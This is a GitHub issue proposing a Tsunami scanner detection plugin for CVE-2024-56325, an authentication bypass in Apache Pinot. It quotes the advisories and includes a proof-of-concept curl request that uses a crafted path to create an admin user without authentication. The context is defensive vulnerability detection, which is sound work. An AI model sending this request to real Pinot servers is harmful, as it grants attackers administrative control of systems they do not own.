Skip to content

PRP: CVE-2024-56325 Apache Pinot Authentication Bypass Issue #621

New issue
New issue
Closed
#683
Closed
PRP: CVE-2024-56325 Apache Pinot Authentication Bypass Issue#621
#683
Assignees
joernNNN
Labels
Contributor mainThe main issue a contributor is working on (top of the contribution queue).PRP:Acceptedtemplated
@lilou1337

Description

@lilou1337
lilou1337
opened on Mar 28, 2025

Hello Tsunami Team

I would like to provide a plugin for CVE-2024-56325 (Apache Pinot Authentication Bypass Issue)

Apache Pinot
Description from the Apache Pinot project website:

Apache Pinot™: The real-time analytics open source platform for lightning-fast insights, effortless scaling, and cost-effective data-driven decisions.

Originally developed at LinkedIn, Apache PinotTM is a real-time distributed OLAP datastore, purpose-built to provide ultra low-latency analytics at extremely high throughput.

With its distributed architecture and columnar storage, Apache Pinot empowers businesses to gain valuable insights from real-time data, supporting data-driven decision-making and applications.

Vulnerability details
CVSS 3.1 rating (according to ZDI): 9.8, AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Vulnerability description from the Zero Day Initiative advisory:

This vulnerability allows remote attackers to bypass authentication on affected installations of Apache Pinot. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the AuthenticationFilter class. The issue results from insufficient neutralization of special characters in a URI. An attacker can leverage this vulnerability to bypass authentication on the system.

Vulnerability description from the Apache Pinot Team, including a PoC:

Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required.

Expected Normal Request and Response Example

curl -X POST -H "Content-Type: application/json" -d
{"username":"hack2","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"}
http://{server_ip}:9000/users
Return:

{"code":401,"error":"HTTP 401 Unauthorized"}
Malicious Request and Response Example

curl -X POST -H "Content-Type: application/json" -d
'{"username":"hack","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"}'
http://{serverip}:9000/users; http://{serverip}:9000/users; .
Return:
{"users":{}}

A new user gets added bypassing authentication, enabling the user to control Pinot.

Metadata

Metadata

Assignees

Labels

Contributor mainThe main issue a contributor is working on (top of the contribution queue).PRP:Acceptedtemplated

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions